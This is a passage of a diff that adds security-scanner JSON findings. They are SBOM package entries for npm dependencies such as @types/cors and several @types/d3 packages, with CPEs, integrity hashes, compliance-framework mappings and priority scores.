agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "19698700a5d5ff08", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @tootallnate/once 2.0.0", + "title": "@tootallnate/once 2.0.0", + "description": "Package discovered: @tootallnate/once 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a7bdaefe075a54be", + "name": "@tootallnate/once", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@tootallnate\\/once:\\@tootallnate\\/once:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40tootallnate/once@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@tootallnate/once/-/once-2.0.0.tgz", + "integrity": "sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "80bf92167036230d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/caseless 0.12.5", + "title": "@types/caseless 0.12.5", + "description": "Package discovered: @types/caseless 0.12.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7578f19b88adc968", + "name": "@types/caseless", + "version": "0.12.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/caseless:\\@types\\/caseless:0.12.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/caseless@0.12.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.5.tgz", + "integrity": "sha512-hWtVTC2q7hc7xZ/RLbxapMvDMgUnDvKvMOpKal4DrMyfGBUfB1oKaZlIRr6mJL+If3bAP6sV/QneGzF6tJjZDg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a5c07d1028c25891", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/cors 2.8.19", + "title": "@types/cors 2.8.19", + "description": "Package discovered: @types/cors 2.8.19", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8b6775e086bda391", + "name": "@types/cors", + "version": "2.8.19", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/cors:\\@types\\/cors:2.8.19:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/cors@2.8.19", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/cors/-/cors-2.8.19.tgz", + "integrity": "sha512-mFNylyeyqN93lfe/9CSxOGREz8cpzAhH+E93xJ4xWQf62V8sQ/24reV2nyzUWM6H6Xji+GGHpkbLe7pVoUEskg==", + "dependencies": { + "@types/node": "*" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d3e89ddbd967f67d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/d3-array 3.2.2", + "title": "@types/d3-array 3.2.2", + "description": "Package discovered: @types/d3-array 3.2.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "59c0361f7de521dd", + "name": "@types/d3-array", + "version": "3.2.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/d3-array:\\@types\\/d3-array:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3-array:\\@types\\/d3_array:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_array:\\@types\\/d3-array:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_array:\\@types\\/d3_array:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-array:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_array:3.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/d3-array@3.2.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/d3-array/-/d3-array-3.2.2.tgz", + "integrity": "sha512-hOLWVbm7uRza0BYXpIIW5pxfrKe0W+D5lrFiAEYR+pb6w3N2SwSMaJbXdUfSEv+dT4MfHBLtn5js0LAWaO6otw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4a5d6407d36c3dfe", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/d3-color 3.1.3", + "title": "@types/d3-color 3.1.3", + "description": "Package discovered: @types/d3-color 3.1.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ad88e8187765d8aa", + "name": "@types/d3-color", + "version": "3.1.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/d3-color:\\@types\\/d3-color:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3-color:\\@types\\/d3_color:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_color:\\@types\\/d3-color:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_color:\\@types\\/d3_color:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-color:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_color:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/d3-color@3.1.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/d3-color/-/d3-color-3.1.3.tgz", + "integrity": "sha512-iO90scth9WAbmgv7ogoq57O9YpKmFBbmoEoCHDB2xMBY0+/KVrqAaCDyCE16dUspeOvIxFFRI+0sEtqDqy2b4A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "075de1dd01220805", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/d3-ease 3.0.2", + "title": "@types/d3-ease 3.0.2", + "description": "Package discovered: @types/d3-ease 3.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "df6234ea1d1790c8", + "name": "@types/d3-ease", + "version": "3.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/d3-ease:\\@types\\/d3-ease:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3-ease:\\@types\\/d3_ease:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_ease:\\@types\\/d3-ease:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_ease:\\@types\\/d3_ease:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-ease:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_ease:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/d3-ease@3.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/d3-ease/-/d3-ease-3.0.2.tgz", + "integrity": "sha512-NcV1JjO5oDzoK26oMzbILE6HW7uVXOHLQvHshBUW4UMdZGfiY6v5BeQwh9a9tCzv+CeefZQHJt5SRgK154RtiA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ac33d3528c07735d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/d3-interpolate 3.0.4", + "title": "@types/d3-interpolate 3.0.4", + "description": "Package discovered: @types/d3-interpolate 3.0.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d2cfc65d37d7fda7", + "name": "@types/d3-interpolate", + "version": "3.0.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/d3-interpolate:\\@types\\/d3-interpolate:3.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3-interpolate:\\@types\\/d3_interpolate:3.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_interpolate:\\@types\\/d3-interpolate:3.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_interpolate:\\@types\\/d3_interpolate:3.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-interpolate:3.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_interpolate:3.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/d3-interpolate@3.0.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/d3-interpolate/-/d3-interpolate-3.0.4.tgz", + "integrity": "sha512-mgLPETlrpVV1YRJIglr4Ez47g7Yxjl1lj7YKsiMCb27VJH9W8NVM6Bb9d8kkpG/uAQS5AmbA48q2IAolKKo1MA==", + "dependencies": { + "@types/d3-color": "*" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9ef37f1ec9a73980", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/d3-path 3.1.1", + "title": "@types/d3-path 3.1.1", + "description": "Package discovered: @types/d3-path 3.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0128eed2457b60d1", + "name": "@types/d3-path", + "version": "3.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/d3-path:\\@types\\/d3-path:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3-path:\\@types\\/d3_path:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_path:\\@types\\/d3-path:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_path:\\@types\\/d3_path:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-path:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_path:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/d3-path@3.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/d3-path/-/d3-path-3.1.1.tgz", + "integrity": "sha512-VMZBYyQvbGmWyWVea0EHs/BwLgxc+MKi1zLDCONksozI4YJMcTt8ZEuIR4Sb1MMTE8MMW49v0IwI5+b7RmfWlg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": 